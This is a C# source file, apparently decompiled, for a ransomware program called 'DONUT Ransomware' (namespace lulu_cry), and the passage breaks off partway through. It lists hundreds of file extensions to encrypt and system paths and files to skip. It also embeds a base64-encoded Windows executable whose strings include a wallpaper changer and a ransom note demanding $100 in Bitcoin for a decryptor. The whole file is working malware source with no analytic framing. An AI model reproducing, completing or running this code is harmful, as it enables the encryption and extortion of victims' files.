using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Windows.Forms;
using Microsoft.Win32;

namespace lulu_cry;

public class Form1 : Form
{
	public static string extensions_target = ".1cd,.3dm,.3ds,.3fr,.3g2,.3gp,.3pr,.7z,.7zip,.aac,.ab4,.abd,.acc,.accdb,.accde,.accdr,.accdt,.ach,.acr,.act,.adb,.adp,.ads,.agdl,.ai,.aiff,.ait,.al,.aoi,.apj,.apk,.arw,.ascx,.asf,.asm,.asp,.aspx,.asset,.asx,.atb,.avi,.awg,.back,.backup,.backupdb,.bak,.bank,.bay,.bdb,.bgt,.bik,.bin,.bkp,.blend,.bmp,.bpw,.bsa,.c,.cash,.cdb,.cdf,.cdr,.cdr3,.cdr4,.cdr5,.cdr6,.cdrw,.cdx,.ce1,.ce2,.cer,.cfg,.cfn,.cgm,.cib,.class,.cls,.cmt,.config,.contact,.cpi,.cpp,.cr2,.craw,.crt,.crw,.cry,.cs,.csh,.csl,.css,.csv,.d3dbsp,.dac,.das,.dat,.db,.db_journal,.db3,.dbf,.dbx,.dc2,.dcr,.dcs,.ddd,.ddoc,.ddrw,.dds,.def,.der,.des,.design,.dgc,.dgn,.dit,.djvu,.dng,.doc,.docm,.docx,.dot,.dotm,.dotx,.drf,.drw,.dtd,.dwg,.dxb,.dxf,.dxg,.edb,.eml,.eps,.erbsql,.erf,.exf,.fdb,.ffd,.fff,.fh,.fhd,.fla,.flac,.flb,.flf,.flv,.flvv,.forge,.fpx,.fxg,.gbr,.gho,.gif,.gray,.grey,.groups,.gry,.h,.hbk,.hdd,.hpp,.html,.ibank,.ibd,.ibz,.idx,.iif,.iiq,.incpas,.indd,.info,.info_,.ini,.iwi,.jar,.java,.jnt,.jpe,.jpeg,.jpg,.js,.json,.k2p,.kc2,.kdbx,.kdc,.key,.kpdx,.kwm,.laccdb,.lbf,.lck,.ldf,.lit,.litemod,.litesql,.lock,.log,.ltx,.lua,.m,.m2ts,.m3u,.m4a,.m4p,.m4v,.ma,.mab,.mapimail,.max,.mbx,.md,.mdb,.mdc,.mdf,.mef,.mfw,.mid,.mkv,.mlb,.mmw,.mny,.money,.moneywell,.mos,.mov,.mp3,.mp4,.mpeg,.mpg,.mrw,.msf,.msg,.myd,.nd,.ndd,.ndf,.nef,.nk2,.nop,.nrw,.ns2,.ns3,.ns4,.nsd,.nsf,.nsg,.nsh,.nvram,.nwb,.nx2,.nxl,.nyf,.oab,.obj,.odb,.odc,.odf,.odg,.odm,.odp,.ods,.odt,.ogg,.oil,.omg,.one,.orf,.ost,.otg,.oth,.otp,.ots,.ott,.p12,.p7b,.p7c,.pab,.pages,.pas,.pat,.pbf,.pcd,.pct,.pdb,.pdd,.pdf,.pef,.pem,.pfx,.php,.pif,.pl,.plc,.plus_muhd,.pm!,.pm,.pmi,.pmj,.pml,.pmm,.pmo,.pmr,.pnc,.pnd,.png,.pnx,.pot,.potm,.potx,.ppam,.pps,.ppsm,.ppsx,.ppt,.pptm,.pptx,.prf,.private,.ps,.psafe3,.psd,.pspimage,.pst,.ptx,.pub,.pwm,.py,.qba,.qbb,.qbm,.qbr,.qbw,.qbx,.qby,.qcow,.qcow2,.qed,.qtb,.r3d,.raf,.rar,.rat,.raw,.rdb,.re4,.rm,.rtf,.rvt,.rw2,.rwl,.rwz,.s3db,.safe,.sas7bdat,.sav,.save,.say,.sd0,.sda,.sdb,.sdf,.sh,.sldm,.sldx,.slm,.sql,.sqlite,.sqlite3,.sqlitedb,.sqlite-shm,.sqlite-wal,.sr2,.srb,.srf,.srs,.srt,.srw,.st4,.st5,.st6,.st7,.st8,.stc,.std,.sti,.stl,.stm,.stw,.stx,.svg,.swf,.sxc,.sxd,.sxg,.sxi,.sxm,.sxw,.tax,.tbb,.tbk,.tbn,.tex,.tga,.thm,.tif,.tiff,.tlg,.tlx,.txt,.upk,.usr,.vbox,.vdi,.vhd,.vhdx,.vmdk,.vmsd,.vmx,.vmxf,.vob,.vpd,.vsd,.wab,.wad,.wallet,.war,.wav,.wb2,.wma,.wmf,.wmv,.wpd,.wps,.x11,.x3f,.xis,.xla,.xlam,.xlk,.xlm,.xlr,.xls,.xlsb,.xlsm,.xlsx,.xlt,.xltm,.xltx,.xlw,.xml,.xps,.xxx,.ycbcra,.yuv,.zip";

	public static string[] stop_list_path = new string[10] { "\\ProgramData", "\\Program Files", "\\Program Files (x86)", "\\Windows", "\\All Users", "\\Local Settings", "\\AppData", "\\lulu", "\\$RECYCLE", "\\System Volume Information" };

	public static string[] stop_list_files = new string[8] { "desktop.ini", "autorun.inf", "ntuser.dat", "iconcache.db", "bootsect.bak", "boot.ini", "ntuser.dat.log", "thumbs.db" };

	public static string landingStr = "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uAAAAAEAAADaCAAAcAEAAAEAAAD3CAAABwADAAAAAAAAcmljaFRleHRCb3gxX1RleHRDaGFuZ2VkXzEAc3RyaW5nMQBsYWJlbDEARm9ybTEATWljcm9zb2Z0LldpbjMyAFRvSW50MzIAc3RyaW5nMgBGb3JtMgBzdHJpbmczAHN0cmluZzQAPE1vZHVsZT4AU1BJRl9TRU5EV0lOSU5JQ0hBTkdFAFNQSUZfVVBEQVRFSU5JRklMRQBTaXplRgBQb2ludEYAU3lzdGVtLklPAFNldFdQAFNQSV9TRVRERVNLV0FMTFBBUEVSAGN1clgAdmFsdWVfXwBnZXRfV29ya2luZ0FyZWEARnJvbUFyZ2IAbXNjb3JsaWIAYwBGb3JtMV9Mb2FkAGFkZF9Mb2FkAEFkZAByaWNoVGV4dEJveDFfVGV4dENoYW5nZWQAU3RyZXRjaGVkAHNldF9FbmFibGVkAFRpbGVkAENlbnRlcmVkAFN5bmNocm9uaXplZABkZWZhdWx0SW5zdGFuY2UAc2V0X0F1dG9TY2FsZU1vZGUARnJvbUltYWdlAElEaXNwb3NhYmxlAHNldF9WaXNpYmxlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAEZpbGxSZWN0YW5nbGUAc2V0X0Zvcm1Cb3JkZXJTdHlsZQBGb250U3R5bGUAc3R5bGUAc2V0X05hbWUAZ2V0X0ZyaWVuZGx5TmFtZQBDb21iaW5lAFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAERpc3Bvc2UAbldpZHRoRWxsaXBzZQBGaWxsRWxsaXBzZQBuSGVpZ2h0RWxsaXBzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBnZXRfV2hpdGUAU1RBVGhyZWFkQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTZXRWYWx1ZQB2YWx1ZQBTYXZlAGRyYXdPblNjcmVlbi5leGUAc2V0X1NpemUAc2V0X0NsaWVudFNpemUAZHJhd0xhbmRpbmcAU3lzdGVtLkRyYXdpbmcuSW1hZ2luZwBUb1N0cmluZwBEcmF3U3RyaW5nAGRpc3Bvc2luZwBTeXN0ZW0uRHJhd2luZwBSZWZyZXNoAFNvbGlkQnJ1c2gAR2V0VGVtcFBhdGgAZ2V0X1dpZHRoAHNldF9XaWR0aABmdVdpbkluaQBnZXRfQmxhY2sAYWRkX1RpY2sAcm9saW5nVGltZXJfVGljawBsYWJlbDFfQ2xpY2sAbGFiZWw0X0NsaWNrAGFkZF9DbGljawBzZXRfSW50ZXJ2YWwATGFiZWwAU3lzdGVtLkNvbXBvbmVudE1vZGVsAHJvdGF0ZUFuZ2VsAEdkaTMyLmRsbAB1c2VyMzIuZGxsAENvbnRhaW5lckNvbnRyb2wAdVBhcmFtAGxwdlBhcmFtAFByb2dyYW0AU3lzdGVtAEZvcm0AVHJhbnNsYXRlVHJhbnNmb3JtAFJvdGF0ZVRyYW5zZm9ybQBFbnVtAHJlc291cmNlTWFuAGRyYXdPblNjcmVlbgBnZXRfUHJpbWFyeVNjcmVlbgBDcmVhdGVSb3VuZFJlY3RSZ24ARnJvbUhyZ24ATWFpbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4Ac2V0X1JlZ2lvbgBBcHBsaWNhdGlvbgBzZXRfTG9jYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AdUFjdGlvbgBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBDb250cm9sQ29sbGVjdGlvbgBzZXRfU3RhcnRQb3NpdGlvbgBGb3JtU3RhcnRQb3NpdGlvbgBFeGNlcHRpb24AUnVuAEN1bHR1cmVJbmZvAFN5c3RlbVBhcmFtZXRlcnNJbmZvAEJpdG1hcABnZXRfQm1wAHNldF9TaG93SW5UYXNrYmFyAHNlbmRlcgBnZXRfUmVzb3VyY2VNYW5hZ2VyAFBhaW50RXZlbnRIYW5kbGVyAFN5c3RlbS5Db2RlRG9tLkNvbXBpbGVyAHJvbGluZ1RpbWVyAElDb250YWluZXIAQ3VycmVudFVzZXIAc2V0X0JhY2tDb2xvcgAuY3RvcgAuY2N0b3IAZ2V0X0dyYXBoaWNzAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAGRyYXdPblNjcmVlbi5Gb3JtMS5yZXNvdXJjZXMAZHJhd09uU2NyZWVuLkZvcm0yLnJlc291cmNlcwBkcmF3T25TY3JlZW4uUHJvcGVydGllcy5SZXNvdXJjZXMucmVzb3VyY2VzAERlYnVnZ2luZ01vZGVzAEJydXNoZXMAZHJhd09uU2NyZWVuLlByb3BlcnRpZXMARW5hYmxlVmlzdWFsU3R5bGVzAFNldHRpbmdzAFBhaW50RXZlbnRBcmdzAGdldF9Db250cm9scwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBzZXRfQXV0b1NjYWxlRGltZW5zaW9ucwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAY29tcG9uZW50cwBDb25jYXQASW1hZ2VGb3JtYXQAUGl4ZWxGb3JtYXQAbkJvdHRvbVJlY3QAblRvcFJlY3QAbkxlZnRSZWN0AG5SaWdodFJlY3QAT2JqZWN0AGdldF9IZWlnaHQAc2V0X0hlaWdodABHcmFwaGljc1VuaXQAZ2V0X0RlZmF1bHQAU2V0Q29tcGF0aWJsZVRleHRSZW5kZXJpbmdEZWZhdWx0AEluaXRpYWxpemVDb21wb25lbnQARm9ybTFfUGFpbnQAcGljdHVyZUJveDFfUGFpbnQARm9ybTJfUGFpbnQAYWRkX1BhaW50AFBvaW50AHNldF9Gb250AENvbnZlcnQAc2V0X1RvcE1vc3QAZHJhd0RvbnV0AFN1c3BlbmRMYXlvdXQAUmVzdW1lTGF5b3V0AHNldF9UZXh0AFNob3cAc2V0X1RhYkluZGV4AE9wZW5TdWJLZXkAUmVnaXN0cnlLZXkAZ2V0X0Fzc2VtYmx5AFJlZ2lzdHJ5AHNldF9PcGFjaXR5AFN5c3RlbS5TZWN1cml0eQAAAAtEAE8ATgBVAFQAAAtBAHIAaQBhAGwAAAtGAG8AcgBtADEAABt3AGEAbABsAHAAYQBwAGUAcgAuAGIAbQBwAAArQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbABcAEQAZQBzAGsAdABvAHAAAB1XAGEAbABsAHAAYQBwAGUAcgBTAHQAeQBsAGUAABtUAGkAbABlAFcAYQBsAGwAcABhAHAAZQByAAApTQBpAGMAcgBvAHMAbwBmAHQAIABTAGEAbgBzACAAUwBlAHIAaQBmAAANbABhAGIAZQBsADEAAAtGAG8AcgBtADIAAA1PAG8AbwBvAHAAcwAAgP1IAGkALgAKAEEAbABsACAAeQBvAHUAcgAgAGYAaQBsAGUAcwAgAGgAYQB2AGUAIABiAGUAZQBuACAARQBOAEMAUgBZAFAAVABFAEQAIABiAHkAIABEAE8ATgBVAFQAIABSAGEAbgBzAG8AbQB3AGEAcgBlAC4ACgBEAG8AIAB5AG8AdQAgAHcAYQBuAHQAIAB0AG8AIAByAGUAcwB0AG8AcgBlACAAeQBvAHUAcgAgAGYAaQBsAGUAcwA/AAoAWQBvAHUAcgAgAHMAaABvAHUAbABkACAAYgB1AHkAIABEAG8AbgB1AHQARABlAGMAcgB5AHAAdABvAHIALgAAJ0MAdQByAHIAZQBuAHQAIABQAHIAaQBjAGUAIAAkADEAMAAwAC4AAIEbRgBvAHIAIABwAGEAeQBtAGUAbgB0ACAAeQBvAHUAcgAgAG4AZQBlAGQAIABjAHIAeQBwAHQAbwBjAHUAcgByAGUAbgBjAHkAIABCAGkAdABDAG8AaQBuAC4ACgBXAHIAaQB0AGUAI